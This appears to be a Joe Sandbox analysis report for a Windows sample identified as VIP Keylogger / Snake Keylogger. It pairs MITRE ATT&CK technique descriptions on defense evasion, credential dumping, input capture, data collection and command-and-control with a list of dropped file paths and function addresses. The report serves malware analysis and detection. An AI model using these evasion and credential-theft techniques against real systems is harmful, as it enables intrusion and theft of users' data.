Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YJwE2gTm02.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_329aefe0a583e079b85dc8873b2b76569f485ff_af83d973_d53e92a5-3814-4ea7-8360-85bcb389dce7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE96C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB13.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB43.tmp.xml

C:\Users\user\AppData\Local\Temp\Halitherses

C:\Users\user\AppData\Local\Temp\aut8DDF.tmp

C:\Users\user\AppData\Local\Temp\aut96B8.tmp

C:\Users\user\AppData\Local\Temp\autCEFF.tmp

C:\Users\user\AppData\Local\toggeries\savagenesses.exe

Windows Analysis Report
YJwE2gTm02.exe

Function 009042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 009042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00942BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00902CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0094065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0090344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre